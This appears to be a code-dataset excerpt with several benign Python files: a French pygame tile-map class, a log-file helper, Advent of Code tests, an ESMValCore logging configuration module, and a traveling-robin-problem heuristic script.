def __init__(self, nom, camera=(0, 0), musique=None):
"""Initialise la map
Avec un nom, la position de la camera, la couleur de fond
Ajoute une hitbox pour les collisions et convertis le fichier de la map
Sous forme de matrice en 3 dimensions
1 map est composée de 4 couches, nommées respectivement 0, 1, 2, 3
Seul la couche "3" (la 4 ème) passe DEVANT le personnage.
Les couches 0 1 et 2 sont pour les collisions et les graphismes
Système de musique créé par Anthony.
"""
self.compteur = 0 # Variable du compteur d'animation initialisé à 0
x, y = camera # On extrait les coordonnées de la tuple
self.nom = nom # Définition du nom de la map
# On met -x et -y afin d'utiliser des coordonnées positives.
# En effet la map utilise un repère orthonormé standard partageant son 0 avec le repère pygame.
# Elle est donc très souvent négative.
self.x_camera = x # Camera X (position de la camera en fonction de l'axe des abcysses)
self.y_camera = y # Camera Y (position de la camera en fonction de l'ordonnée)
self.matrices = { # Dictionnaire des matrices
0: [], # Matrice qui stockera le fond
1: [], # Matrice qui stockera le milieu
2: [], # Matrice qui stockera le 1er plan
3: [] # Matrice qui stockera le plan spécial
}
self.charger_matrice() # Chargement de la matrice, du fichier carte
# Pour le nombre de colonnes et de lignes on utilise la matrice du fond
self.x = len(self.matrices[0][0]) # Variable contenant le nombre de colonnes
self.y = len(self.matrices[0]) # Variable contenant le nombre de lignes
# Variable contenant l'arrière plan de la map (pg.SCRALPHA permet de rendre la surface transparente)
self.arriere_plan = pg.Surface((self.x*32, self.y*32), pg.SRCALPHA) # On crée une surface de la taille de la map
# Variable contenant le premier plan de la map
self.premier_plan = pg.Surface((self.x*32, self.y*32), pg.SRCALPHA) # On crée une surface de la taille de la map
self.charger_hitboxs() # Charger les collisions de la map (Hitboxs)
self.charger_images() # Charger l'arrière plan et le premier plan
self.vider_monstres() # Supprimer les monstres de l'ancienne map (si il y en a)
if musique is not None: # Si une musique est donnée dans les paramètres
if cp.musique is not None: # Si une musique est jouée
cp.musique.stop() # Alors arrêter cette musique
cp.musique = pg.mixer.Sound("son/" + musique) # Récuperer la musique sous forme d'objet
cp.musique.play(loops=-1) # Jouer la musique (loops=-1 permet de la jouer en boucle indéfiniment)
def afficher_arriere_plan(self):
""" Affiche les 3 premières couches de la map
3 premières couches (0,1,2) = Arrière plan
"""
cp.ecran.blit(self.arriere_plan, (self.x_camera,
self.y_camera)) # Affiche l'arrière plan
def afficher_premier_plan(self):
""" Affiche la 4 eme couche de la map
Quatrième couche (3) = Premier plan devant le personnage
"""
cp.ecran.blit(self.premier_plan, (self.x_camera,
self.y_camera)) # Affiche le premier plan
def bouger_hitbox(self, x, y):
"""Déplace les hitboxs de collision
Permets de déplacer les hitboxs de collisions, utilisé lors du
Déplacement du personnage ou de la camera
"""
# nouvelle_liste va écraser la liste des constantes de collision pour les tuiles
for hitbox in cc.groupes["tuile"]: # Je parcours le contenu du groupe
hitbox.rect.move_ip(x, y) # Déplacer le rect.
def bouger(self, x, y):
"""Déplacer la map
Déplace:
- Les 3 couches esthétiques de tuiles
- La 4 ème couche qui passe par-dessus le personnage
"""
cp.map.x_camera += x # Bouger la camera
cp.map.y_camera += y # Bouger la camera
def actualiser(self):
"""Actualise la map
Fait les animations de tuiles.
Censé être lancé chaque tick
"""
if self.compteur < 5: # Si le compteur est inférieur à 5
self.compteur += 1 # Incrémenter le compteur
return # Quitter la fonction
for i in range(4): # Parcourir les couches de la map
for y in range(self.y): # Parcourir les tuiles en abscisse
for x in range(self.x): # Parcourir les tuiles en ordonnée
if self.matrices[i][y][x] in ct.animations: # Si la tuile a une animation correspondante
self.matrices[i][y][x] = ct.animations[self.matrices[i][y][x]] # Lui assigner l'animation correspondante
tuile = ct.tuiles[self.matrices[i][y][x]] # On extrait la tuile
if i == 3: # Si on parcours le premier plan
self.premier_plan.blit(tuile, (x*32, y*32)) # On colle les images sur l'arrière plan tuile par tuile
else: # Sinon (implicitement, on parcours l'arrière plan)
self.arriere_plan.blit(tuile, (x*32, y*32)) # On colle les images sur le premier plan tuile par tuile
self.compteur = 0
def charger_matrice(self):
"""Charger les matrices
Lire le fichier de la carte et stocker les tuiles dans une matrice
Permets de convertir un .csv en tableau/matrice.
Permets de convertir plusieurs .csv en tableaux 3D
"""
for i in range(4): # On a 4 calques, ici on parcours les calques
nom_fichier = "maps/" + self.nom + "_" + str(i) + ".csv" # Nom du fichier
# # Ex: nom_0.csv
f = open(nom_fichier, "r") # Ouvrir le fichier
for ligne in f.readlines(): # Je regarde chaque lignes
ligne = ligne.replace("\n", "") # Je supprime les \n
ligne = ligne.split(",") # On convertis la ligne en liste
if ligne != []: # Si la ligne en liste n'est pas nulle
self.matrices[i].append(ligne) # On ajoute la liste
f.close() # Fermer fichier
def charger_hitboxs(self):
""" Crée les rectangles de collisions de la map
Permets de charger les rectangles de collision de la map
(Peut génèrer des latences !)
"""
for groupe in cc.groupes: # Je parcours les groupes de collision
cc.groupes[groupe] = pg.sprite.Group() # Je les réinitialise
for i in range(3): # Je parcours les 3 premières couches de la map
for y in range(self.y): # Parcours les colonnes
for x in range(self.x): # Je parcours les lignes
if self.matrices[i][y][x] in ct.tuiles: # Si la tuile existe
if self.matrices[i][y][x] in ct.collisions: # Si on lui a assigné des collisions
x_tuile = self.x_camera + x*32 # Position de la tuile (abscisses)
y_tuile = self.y_camera + y*32 # Position de la tuile (ordonnée)
tuile = ct.tuiles[self.matrices[i][y][x]] # On extrait l'image
mask = pg.mask.from_surface(tuile) # On fait le mask a partir de cette image
rect = pg.Rect(x_tuile, y_tuile, 32, 32) # On créé le rectangle associé a l'image
col.Hitbox("tuile", rect, mask) # Sauvegarder la liste (rect + mask)
def vider_monstres(self):
""" Supprime tout les monstres
Utilisé lors d'un changement de map
"""
cp.entites_liste = []
def charger_monstres(self):
""" Crée les monstres associés a une map
Créer des monstres d'une liste
"""
liste_monstre = []
for type_monstre in cp.niveau[self.nom]:
liste_monstre.append(type_monstre)
for type_monstre in liste_monstre:
for liste_parametre in cp.niveau[self.nom][type_monstre]:
monstre = mstr.Monstre(type_monstre, liste_parametre)
cp.entites_liste.append(monstre)
for entite in cp.entites_liste:
entite.deplacement()
entite.afficher()
def charger_images(self):
""" Charge dans la variable self.arriere_plan l'image superposée des 3 premieres couches (0, 1, 2)
Charge dans la variable self.premier_plan l'image de la dernière couche (3)
"""
for i in range(4): # Je parcours les couches
for y in range(self.y): # Parcours les colonnes
for x in range(self.x): # Je parcours les lignes
if self.matrices[i][y][x] in ct.tuiles: # Si elle existe
tuile = ct.tuiles[self.matrices[i][y][x]] # On extrait
if i < 3: # Si on parcours les couches 2, 1 et 0
self.arriere_plan.blit(tuile, (x*32, y*32)) # On colle les images sur l'arrière plan tuile par tuile
else:
self.premier_plan.blit(tuile, (x*32, y*32)) # On colle les images sur le premier plan tuile par tuile
| # -*- coding: utf-8 -*-
"""Les maps
Objet "Tuile" qui correspond a une tuile.
Objet "Map" qui correspond a une carte de tuiles.
Auteur: <NAME> pour correspondre au modèle de carte imaginé par Anthony
"""
from constantes import constantes_tuiles as ct
from constantes import constantes_partie as cp
from constantes import constantes_collisions as cc
from classes import monstre as mstr
from classes import collision as col
import pygame as pg
class Map:
"""Créer une map
Pour créer des maps directement et facilement (Un outil)
Permets de:
- Charger une map (Avec 4 couches de tuiles)
- Afficher une map (Avec les 4 couches de tuiles)
++ Support transparence.
"""
def __init__(self, nom, camera=(0, 0), musique=None):
"""Initialise la map
Avec un nom, la position de la camera, la couleur de fond
Ajoute une hitbox pour les collisions et convertis le fichier de la map
Sous forme de matrice en 3 dimensions
1 map est composée de 4 couches, nommées respectivement 0, 1, 2, 3
Seul la couche "3" (la 4 ème) passe DEVANT le personnage.
Les couches 0 1 et 2 sont pour les collisions et les graphismes
Système de musique créé par Anthony.
"""
self.compteur = 0 # Variable du compteur d'animation initialisé à 0
x, y = camera # On extrait les coordonnées de la tuple
self.nom = nom # Définition du nom de la map
# On met -x et -y afin d'utiliser des coordonnées positives.
# En effet la map utilise un repère orthonormé standard partageant son 0 avec le repère pygame.
# Elle est donc très souvent négative.
self.x_camera = x # Camera X (position de la camera en fonction de l'axe des abcysses)
self.y_camera = y # Camera Y (position de la camera en fonction de l'ordonnée)
self.matrices = { # Dictionnaire des matrices
0: [], # Matrice qui stockera le fond
1: [], # Matrice qui stockera le milieu
2: [], # Matrice qui stockera le 1er plan
3: [] # Matrice qui stockera le plan spécial
}
self.charger_matrice() # Chargement de la matrice, du fichier carte
# Pour le nombre de colonnes et de lignes on utilise la matrice du fond
self.x = len(self.matrices[0][0]) # Variable contenant le nombre de colonnes
self.y = len(self.matrices[0]) # Variable contenant le nombre de lignes
# Variable contenant l'arrière plan de la map (pg.SCRALPHA permet de rendre la surface transparente)
self.arriere_plan = pg.Surface((self.x*32, self.y*32), pg.SRCALPHA) # On crée une surface de la taille de la map
# Variable contenant le premier plan de la map
self.premier_plan = pg.Surface((self.x*32, self.y*32), pg.SRCALPHA) # On crée une surface de la taille de la map
self.charger_hitboxs() # Charger les collisions de la map (Hitboxs)
self.charger_images() # Charger l'arrière plan et le premier plan
self.vider_monstres() # Supprimer les monstres de l'ancienne map (si il y en a)
if musique is not None: # Si une musique est donnée dans les paramètres
if cp.musique is not None: # Si une musique est jouée
cp.musique.stop() # Alors arrêter cette musique
cp.musique = pg.mixer.Sound("son/" + musique) # Récuperer la musique sous forme d'objet
cp.musique.play(loops=-1) # Jouer la musique (loops=-1 permet de la jouer en boucle indéfiniment)
def afficher_arriere_plan(self):
""" Affiche les 3 premières couches de la map
3 premières couches (0,1,2) = Arrière plan
"""
cp.ecran.blit(self.arriere_plan, (self.x_camera,
self.y_camera)) # Affiche l'arrière plan
def afficher_premier_plan(self):
""" Affiche la 4 eme couche de la map
Quatrième couche (3) = Premier plan devant le personnage
"""
cp.ecran.blit(self.premier_plan, (self.x_camera,
self.y_camera)) # Affiche le premier plan
def bouger_hitbox(self, x, y):
"""Déplace les hitboxs de collision
Permets de déplacer les hitboxs de collisions, utilisé lors du
Déplacement du personnage ou de la camera
"""
# nouvelle_liste va écraser la liste des constantes de collision pour les tuiles
for hitbox in cc.groupes["tuile"]: # Je parcours le contenu du groupe
hitbox.rect.move_ip(x, y) # Déplacer le rect.
def bouger(self, x, y):
"""Déplacer la map
Déplace:
- Les 3 couches esthétiques de tuiles
- La 4 ème couche qui passe par-dessus le personnage
"""
cp.map.x_camera += x # Bouger la camera
cp.map.y_camera += y # Bouger la camera
def actualiser(self):
"""Actualise la map
Fait les animations de tuiles.
Censé être lancé chaque tick
"""
if self.compteur < 5: # Si le compteur est inférieur à 5
self.compteur += 1 # Incrémenter le compteur
return # Quitter la fonction
for i in range(4): # Parcourir les couches de la map
for y in range(self.y): # Parcourir les tuiles en abscisse
for x in range(self.x): # Parcourir les tuiles en ordonnée
if self.matrices[i][y][x] in ct.animations: # Si la tuile a une animation correspondante
self.matrices[i][y][x] = ct.animations[self.matrices[i][y][x]] # Lui assigner l'animation correspondante
tuile = ct.tuiles[self.matrices[i][y][x]] # On extrait la tuile
if i == 3: # Si on parcours le premier plan
self.premier_plan.blit(tuile, (x*32, y*32)) # On colle les images sur l'arrière plan tuile par tuile
else: # Sinon (implicitement, on parcours l'arrière plan)
self.arriere_plan.blit(tuile, (x*32, y*32)) # On colle les images sur le premier plan tuile par tuile
self.compteur = 0
def charger_matrice(self):
"""Charger les matrices
Lire le fichier de la carte et stocker les tuiles dans une matrice
Permets de convertir un .csv en tableau/matrice.
Permets de convertir plusieurs .csv en tableaux 3D
"""
for i in range(4): # On a 4 calques, ici on parcours les calques
nom_fichier = "maps/" + self.nom + "_" + str(i) + ".csv" # Nom du fichier
# # Ex: nom_0.csv
f = open(nom_fichier, "r") # Ouvrir le fichier
for ligne in f.readlines(): # Je regarde chaque lignes
ligne = ligne.replace("\n", "") # Je supprime les \n
ligne = ligne.split(",") # On convertis la ligne en liste
if ligne != []: # Si la ligne en liste n'est pas nulle
self.matrices[i].append(ligne) # On ajoute la liste
f.close() # Fermer fichier
def charger_hitboxs(self):
""" Crée les rectangles de collisions de la map
Permets de charger les rectangles de collision de la map
(Peut génèrer des latences !)
"""
for groupe in cc.groupes: # Je parcours les groupes de collision
cc.groupes[groupe] = pg.sprite.Group() # Je les réinitialise
for i in range(3): # Je parcours les 3 premières couches de la map
for y in range(self.y): # Parcours les colonnes
for x in range(self.x): # Je parcours les lignes
if self.matrices[i][y][x] in ct.tuiles: # Si la tuile existe
if self.matrices[i][y][x] in ct.collisions: # Si on lui a assigné des collisions
x_tuile = self.x_camera + x*32 # Position de la tuile (abscisses)
y_tuile = self.y_camera + y*32 # Position de la tuile (ordonnée)
tuile = ct.tuiles[self.matrices[i][y][x]] # On extrait l'image
mask = pg.mask.from_surface(tuile) # On fait le mask a partir de cette image
rect = pg.Rect(x_tuile, y_tuile, 32, 32) # On créé le rectangle associé a l'image
col.Hitbox("tuile", rect, mask) # Sauvegarder la liste (rect + mask)
def vider_monstres(self):
""" Supprime tout les monstres
Utilisé lors d'un changement de map
"""
cp.entites_liste = []
def charger_monstres(self):
""" Crée les monstres associés a une map
Créer des monstres d'une liste
"""
liste_monstre = []
for type_monstre in cp.niveau[self.nom]:
liste_monstre.append(type_monstre)
for type_monstre in liste_monstre:
for liste_parametre in cp.niveau[self.nom][type_monstre]:
monstre = mstr.Monstre(type_monstre, liste_parametre)
cp.entites_liste.append(monstre)
for entite in cp.entites_liste:
entite.deplacement()
entite.afficher()
def charger_images(self):
""" Charge dans la variable self.arriere_plan l'image superposée des 3 premieres couches (0, 1, 2)
Charge dans la variable self.premier_plan l'image de la dernière couche (3)
"""
for i in range(4): # Je parcours les couches
for y in range(self.y): # Parcours les colonnes
for x in range(self.x): # Je parcours les lignes
if self.matrices[i][y][x] in ct.tuiles: # Si elle existe
tuile = ct.tuiles[self.matrices[i][y][x]] # On extrait
if i < 3: # Si on parcours les couches 2, 1 et 0
self.arriere_plan.blit(tuile, (x*32, y*32)) # On colle les images sur l'arrière plan tuile par tuile
else:
self.premier_plan.blit(tuile, (x*32, y*32)) # On colle les images sur le premier plan tuile par tuile
| fr | 0.970525 | # -*- coding: utf-8 -*- Les maps Objet "Tuile" qui correspond a une tuile. Objet "Map" qui correspond a une carte de tuiles. Auteur: <NAME> pour correspondre au modèle de carte imaginé par Anthony Créer une map Pour créer des maps directement et facilement (Un outil) Permets de: - Charger une map (Avec 4 couches de tuiles) - Afficher une map (Avec les 4 couches de tuiles) ++ Support transparence. Initialise la map Avec un nom, la position de la camera, la couleur de fond Ajoute une hitbox pour les collisions et convertis le fichier de la map Sous forme de matrice en 3 dimensions 1 map est composée de 4 couches, nommées respectivement 0, 1, 2, 3 Seul la couche "3" (la 4 ème) passe DEVANT le personnage. Les couches 0 1 et 2 sont pour les collisions et les graphismes Système de musique créé par Anthony. # Variable du compteur d'animation initialisé à 0 # On extrait les coordonnées de la tuple # Définition du nom de la map # On met -x et -y afin d'utiliser des coordonnées positives. # En effet la map utilise un repère orthonormé standard partageant son 0 avec le repère pygame. # Elle est donc très souvent négative. 
# Camera X (position de la camera en fonction de l'axe des abcysses) # Camera Y (position de la camera en fonction de l'ordonnée) # Dictionnaire des matrices # Matrice qui stockera le fond # Matrice qui stockera le milieu # Matrice qui stockera le 1er plan # Matrice qui stockera le plan spécial # Chargement de la matrice, du fichier carte # Pour le nombre de colonnes et de lignes on utilise la matrice du fond # Variable contenant le nombre de colonnes # Variable contenant le nombre de lignes # Variable contenant l'arrière plan de la map (pg.SCRALPHA permet de rendre la surface transparente) # On crée une surface de la taille de la map # Variable contenant le premier plan de la map # On crée une surface de la taille de la map # Charger les collisions de la map (Hitboxs) # Charger l'arrière plan et le premier plan # Supprimer les monstres de l'ancienne map (si il y en a) # Si une musique est donnée dans les paramètres # Si une musique est jouée # Alors arrêter cette musique # Récuperer la musique sous forme d'objet # Jouer la musique (loops=-1 permet de la jouer en boucle indéfiniment) Affiche les 3 premières couches de la map 3 premières couches (0,1,2) = Arrière plan # Affiche l'arrière plan Affiche la 4 eme couche de la map Quatrième couche (3) = Premier plan devant le personnage # Affiche le premier plan Déplace les hitboxs de collision Permets de déplacer les hitboxs de collisions, utilisé lors du Déplacement du personnage ou de la camera # nouvelle_liste va écraser la liste des constantes de collision pour les tuiles # Je parcours le contenu du groupe # Déplacer le rect. Déplacer la map Déplace: - Les 3 couches esthétiques de tuiles - La 4 ème couche qui passe par-dessus le personnage # Bouger la camera # Bouger la camera Actualise la map Fait les animations de tuiles. 
Censé être lancé chaque tick # Si le compteur est inférieur à 5 # Incrémenter le compteur # Quitter la fonction # Parcourir les couches de la map # Parcourir les tuiles en abscisse # Parcourir les tuiles en ordonnée # Si la tuile a une animation correspondante # Lui assigner l'animation correspondante # On extrait la tuile # Si on parcours le premier plan # On colle les images sur l'arrière plan tuile par tuile # Sinon (implicitement, on parcours l'arrière plan) # On colle les images sur le premier plan tuile par tuile Charger les matrices Lire le fichier de la carte et stocker les tuiles dans une matrice Permets de convertir un .csv en tableau/matrice. Permets de convertir plusieurs .csv en tableaux 3D # On a 4 calques, ici on parcours les calques # Nom du fichier # # Ex: nom_0.csv # Ouvrir le fichier # Je regarde chaque lignes # Je supprime les \n # On convertis la ligne en liste # Si la ligne en liste n'est pas nulle # On ajoute la liste # Fermer fichier Crée les rectangles de collisions de la map Permets de charger les rectangles de collision de la map (Peut génèrer des latences !) 
# Je parcours les groupes de collision # Je les réinitialise # Je parcours les 3 premières couches de la map # Parcours les colonnes # Je parcours les lignes # Si la tuile existe # Si on lui a assigné des collisions # Position de la tuile (abscisses) # Position de la tuile (ordonnée) # On extrait l'image # On fait le mask a partir de cette image # On créé le rectangle associé a l'image # Sauvegarder la liste (rect + mask) Supprime tout les monstres Utilisé lors d'un changement de map Crée les monstres associés a une map Créer des monstres d'une liste Charge dans la variable self.arriere_plan l'image superposée des 3 premieres couches (0, 1, 2) Charge dans la variable self.premier_plan l'image de la dernière couche (3) # Je parcours les couches # Parcours les colonnes # Je parcours les lignes # Si elle existe # On extrait # Si on parcours les couches 2, 1 et 0 # On colle les images sur l'arrière plan tuile par tuile # On colle les images sur le premier plan tuile par tuile | 2.921702 | 3 |
scripts/check_and_create_log_file.py | ZhuoZhuoCrayon/AcousticKeyBoard-Web | 5 | 6623889 | # -*- coding: utf-8 -*-
import os
from typing import List
def check_and_create_log_file(log_file_paths: List[str]):
for log_file_path in log_file_paths:
if os.path.exists(log_file_path):
return
log_file_root = log_file_path.rsplit("/", 1)[0]
if not os.path.exists(log_file_root):
os.makedirs(log_file_root)
with open(file=log_file_path, mode="w+") as _:
pass
| # -*- coding: utf-8 -*-
import os
from typing import List
def check_and_create_log_file(log_file_paths: List[str]):
for log_file_path in log_file_paths:
if os.path.exists(log_file_path):
return
log_file_root = log_file_path.rsplit("/", 1)[0]
if not os.path.exists(log_file_root):
os.makedirs(log_file_root)
with open(file=log_file_path, mode="w+") as _:
pass
| en | 0.769321 | # -*- coding: utf-8 -*- | 2.886258 | 3 |
test/test_day_02.py | jacobogomez/adventofcode2021 | 0 | 6623890 | import pytest
from adventofcode2021 import day_02
from .utils import load_file
@pytest.fixture
def input_file():
return load_file("input/day_02.txt")
def test_day02_part_one(input_file):
part_one_answer = day_02.dive(input_file)
assert part_one_answer == 2117664
def test_day02_part_two(input_file):
part_two_answer = day_02.dive_with_aim(input_file)
assert part_two_answer == 2073416724
| import pytest
from adventofcode2021 import day_02
from .utils import load_file
@pytest.fixture
def input_file():
return load_file("input/day_02.txt")
def test_day02_part_one(input_file):
part_one_answer = day_02.dive(input_file)
assert part_one_answer == 2117664
def test_day02_part_two(input_file):
part_two_answer = day_02.dive_with_aim(input_file)
assert part_two_answer == 2073416724
| none | 1 | 2.26639 | 2 | |
esmvalcore/_config/_logging.py | markelg/ESMValCore | 26 | 6623891 | """Configure logging."""
import logging
import logging.config
import os
import time
from pathlib import Path
from typing import Union
import yaml
def _purge_file_handlers(cfg: dict) -> None:
"""Remove handlers with filename set.
This is used to remove file handlers which require an output
directory to be set.
"""
cfg['handlers'] = {
name: handler
for name, handler in cfg['handlers'].items()
if 'filename' not in handler
}
prev_root = cfg['root']['handlers']
cfg['root']['handlers'] = [
name for name in prev_root if name in cfg['handlers']
]
def _get_log_files(cfg: dict,
output_dir: Union[os.PathLike, str] = None) -> list:
"""Initialize log files for the file handlers."""
log_files = []
handlers = cfg['handlers']
for handler in handlers.values():
filename = handler.get('filename', None)
if filename:
if output_dir is None:
raise ValueError('`output_dir` must be defined')
if not os.path.isabs(filename):
handler['filename'] = os.path.join(output_dir, filename)
log_files.append(handler['filename'])
return log_files
def _update_stream_level(cfg: dict, level=None):
"""Update the log level for the stream handlers."""
handlers = cfg['handlers']
for handler in handlers.values():
if level is not None and 'stream' in handler:
if handler['stream'] in ('ext://sys.stdout', 'ext://sys.stderr'):
handler['level'] = level.upper()
def configure_logging(cfg_file: Union[os.PathLike, str] = None,
output_dir: Union[os.PathLike, str] = None,
console_log_level: str = None) -> list:
"""Configure logging.
Parameters
----------
cfg_file : str, optional
Logging config file. If `None`, defaults to `configure-logging.yml`
output_dir : str, optional
Output directory for the log files. If `None`, log only to the console.
console_log_level : str, optional
If `None`, use the default (INFO).
Returns
-------
log_files : list
Filenames that will be logged to.
"""
if cfg_file is None:
cfg_file = Path(__file__).parent / 'config-logging.yml'
cfg_file = Path(cfg_file).absolute()
with open(cfg_file) as file_handler:
cfg = yaml.safe_load(file_handler)
if output_dir is None:
_purge_file_handlers(cfg)
log_files = _get_log_files(cfg, output_dir=output_dir)
_update_stream_level(cfg, level=console_log_level)
logging.config.dictConfig(cfg)
logging.Formatter.converter = time.gmtime
logging.captureWarnings(True)
return log_files
| """Configure logging."""
import logging
import logging.config
import os
import time
from pathlib import Path
from typing import Union
import yaml
def _purge_file_handlers(cfg: dict) -> None:
"""Remove handlers with filename set.
This is used to remove file handlers which require an output
directory to be set.
"""
cfg['handlers'] = {
name: handler
for name, handler in cfg['handlers'].items()
if 'filename' not in handler
}
prev_root = cfg['root']['handlers']
cfg['root']['handlers'] = [
name for name in prev_root if name in cfg['handlers']
]
def _get_log_files(cfg: dict,
output_dir: Union[os.PathLike, str] = None) -> list:
"""Initialize log files for the file handlers."""
log_files = []
handlers = cfg['handlers']
for handler in handlers.values():
filename = handler.get('filename', None)
if filename:
if output_dir is None:
raise ValueError('`output_dir` must be defined')
if not os.path.isabs(filename):
handler['filename'] = os.path.join(output_dir, filename)
log_files.append(handler['filename'])
return log_files
def _update_stream_level(cfg: dict, level=None):
"""Update the log level for the stream handlers."""
handlers = cfg['handlers']
for handler in handlers.values():
if level is not None and 'stream' in handler:
if handler['stream'] in ('ext://sys.stdout', 'ext://sys.stderr'):
handler['level'] = level.upper()
def configure_logging(cfg_file: Union[os.PathLike, str] = None,
                      output_dir: Union[os.PathLike, str] = None,
                      console_log_level: str = None) -> list:
    """Configure logging from a YAML dictConfig file.
    Parameters
    ----------
    cfg_file : str, optional
        Logging config file. If `None`, defaults to `config-logging.yml`
        next to this module.
    output_dir : str, optional
        Output directory for the log files. If `None`, log only to the console
        (file handlers are purged from the configuration).
    console_log_level : str, optional
        If `None`, use the default from the config file.
    Returns
    -------
    log_files : list
        Filenames that will be logged to.
    """
    if cfg_file is None:
        cfg_file = Path(__file__).parent / 'config-logging.yml'
    cfg_file = Path(cfg_file).absolute()
    with open(cfg_file) as file_handler:
        cfg = yaml.safe_load(file_handler)
    # No output directory -> drop the file handlers entirely.
    if output_dir is None:
        _purge_file_handlers(cfg)
    log_files = _get_log_files(cfg, output_dir=output_dir)
    _update_stream_level(cfg, level=console_log_level)
    logging.config.dictConfig(cfg)
    # Log timestamps in UTC and route warnings.warn() through logging.
    logging.Formatter.converter = time.gmtime
    logging.captureWarnings(True)
    return log_files
| en | 0.459719 | Configure logging. Remove handlers with filename set. This is used to remove file handlers which require an output directory to be set. Initialize log files for the file handlers. Update the log level for the stream handlers. Configure logging. Parameters ---------- cfg_file : str, optional Logging config file. If `None`, defaults to `configure-logging.yml` output_dir : str, optional Output directory for the log files. If `None`, log only to the console. console_log_level : str, optional If `None`, use the default (INFO). Returns ------- log_files : list Filenames that will be logged to. | 2.719489 | 3 |
src/main.py | EmmanuellaAlbuquerque/traveling-robin-problem | 0 | 6623892 | <filename>src/main.py<gh_stars>0
from pathlib import Path
from robin_file_reader import RobinFileReader
from trp import TRP
from vnd import VND
from copy import deepcopy
import time
# file_path = Path("../instances/n5.txt").absolute()
# file_path = Path("../instances/n6.txt").absolute()
# file_path = Path("../instances/n10p4.txt").absolute()
# file_path = Path("../instances/n15p5.txt").absolute()
# file_path = Path("../instances/n29p7A.txt").absolute()
# file_path = Path("../instances/n29p8B.txt").absolute()
# file_path = Path("../instances/n40p11.txt").absolute()
# file_path = Path("../instances/n52p11.txt").absolute()
file_path = Path("../instances_apa_cup/cup1.txt").absolute()
# file_path = Path("../instances_apa_cup/cup2.txt").absolute()
# file_path = Path("../instances_apa_cup/cup3.txt").absolute()
def showSolution(solution):
    """Print each route as 'a, b, c ;' on its own line."""
    for route in solution:
        formatted = ', '.join(str(address) for address in route)
        print(formatted, end=' ;\n')
def f(agent_list):
    """Objective function: the summed 'cost' over all agents."""
    return sum(agent['cost'] for agent in agent_list)
def getRoutesTotalCost(solution, cost_matrix):
    """Recompute the combined cost of all routes from the cost matrix.

    Each leg's cost is coerced to int, matching how the matrix values
    are read from the instance file.
    """
    grand_total = 0
    for route in solution:
        leg_costs = (int(cost_matrix[a][b]) for a, b in zip(route, route[1:]))
        grand_total += sum(leg_costs)
    return grand_total
def calculateSolution(solution, cost_matrix):
    """Print (does not return) the combined cost of every route."""
    total = 0
    for route in solution:
        for origin, destination in zip(route, route[1:]):
            total += cost_matrix[origin][destination]
    print(total)
# calculateSolution(vnd_solution, cost_matrix)
# --- load the instance -------------------------------------------------
# NOTE(review): ``file`` shadows the builtin and is never closed; a
# ``with open(...)`` block would be safer.
file = open(file_path, 'r')
(dimension, p, cost_matrix) = RobinFileReader(file).getResult()
start_time_trp = time.time()
# constructive algorithm solution (builds the initial TRP routes)
print('constructive algorithm solution')
trp = TRP(dimension, p, cost_matrix)
trp_solution = trp.run()
(initial_cost, trp_agent_list) = trp.calculateTotalCost()
# print(trp_agent_list)
# showSolution(trp_solution)
print('-> total cost:', f(trp_agent_list))
print('-> recalculated trp:', getRoutesTotalCost(trp_solution, cost_matrix))
print("Tempo Gasto: TRP %.2f" % (time.time() - start_time_trp), "seconds ")
print('\n')
start_time_vnd = time.time()
# variable neighbourhood descent solution (local search on deep copies of
# the constructive result, so the TRP solution is left intact)
print('variable neighbourhood descent solution')
vnd = VND()
(vnd_solution, vnd_agent_list) = vnd.run(
    deepcopy(trp_solution), deepcopy(trp_agent_list), cost_matrix)
# print(vnd_agent_list)
# showSolution(vnd_solution)
print('-> final cost:', f(vnd_agent_list))
print('-> recalculated vnd:', getRoutesTotalCost(vnd_solution, cost_matrix))
print("Tempo Gasto: VND %.2f" % (time.time() - start_time_vnd), "seconds ")
print('\n')
| <filename>src/main.py<gh_stars>0
from pathlib import Path
from robin_file_reader import RobinFileReader
from trp import TRP
from vnd import VND
from copy import deepcopy
import time
# file_path = Path("../instances/n5.txt").absolute()
# file_path = Path("../instances/n6.txt").absolute()
# file_path = Path("../instances/n10p4.txt").absolute()
# file_path = Path("../instances/n15p5.txt").absolute()
# file_path = Path("../instances/n29p7A.txt").absolute()
# file_path = Path("../instances/n29p8B.txt").absolute()
# file_path = Path("../instances/n40p11.txt").absolute()
# file_path = Path("../instances/n52p11.txt").absolute()
file_path = Path("../instances_apa_cup/cup1.txt").absolute()
# file_path = Path("../instances_apa_cup/cup2.txt").absolute()
# file_path = Path("../instances_apa_cup/cup3.txt").absolute()
def showSolution(solution):
    """Print each route as 'a, b, c ;' on its own line."""
    for route in solution:
        formatted = ', '.join(str(address) for address in route)
        print(formatted, end=' ;\n')
def f(agent_list):
    """Objective function: the summed 'cost' over all agents."""
    return sum(agent['cost'] for agent in agent_list)
def getRoutesTotalCost(solution, cost_matrix):
    """Recompute the combined cost of all routes from the cost matrix.

    Each leg's cost is coerced to int, matching how the matrix values
    are read from the instance file.
    """
    grand_total = 0
    for route in solution:
        leg_costs = (int(cost_matrix[a][b]) for a, b in zip(route, route[1:]))
        grand_total += sum(leg_costs)
    return grand_total
def calculateSolution(solution, cost_matrix):
    """Print (does not return) the combined cost of every route."""
    total = 0
    for route in solution:
        for origin, destination in zip(route, route[1:]):
            total += cost_matrix[origin][destination]
    print(total)
# calculateSolution(vnd_solution, cost_matrix)
# --- load the instance -------------------------------------------------
# NOTE(review): ``file`` shadows the builtin and is never closed; a
# ``with open(...)`` block would be safer.
file = open(file_path, 'r')
(dimension, p, cost_matrix) = RobinFileReader(file).getResult()
start_time_trp = time.time()
# constructive algorithm solution (builds the initial TRP routes)
print('constructive algorithm solution')
trp = TRP(dimension, p, cost_matrix)
trp_solution = trp.run()
(initial_cost, trp_agent_list) = trp.calculateTotalCost()
# print(trp_agent_list)
# showSolution(trp_solution)
print('-> total cost:', f(trp_agent_list))
print('-> recalculated trp:', getRoutesTotalCost(trp_solution, cost_matrix))
print("Tempo Gasto: TRP %.2f" % (time.time() - start_time_trp), "seconds ")
print('\n')
start_time_vnd = time.time()
# variable neighbourhood descent solution (local search on deep copies of
# the constructive result, so the TRP solution is left intact)
print('variable neighbourhood descent solution')
vnd = VND()
(vnd_solution, vnd_agent_list) = vnd.run(
    deepcopy(trp_solution), deepcopy(trp_agent_list), cost_matrix)
# print(vnd_agent_list)
# showSolution(vnd_solution)
print('-> final cost:', f(vnd_agent_list))
print('-> recalculated vnd:', getRoutesTotalCost(vnd_solution, cost_matrix))
print("Tempo Gasto: VND %.2f" % (time.time() - start_time_vnd), "seconds ")
print('\n')
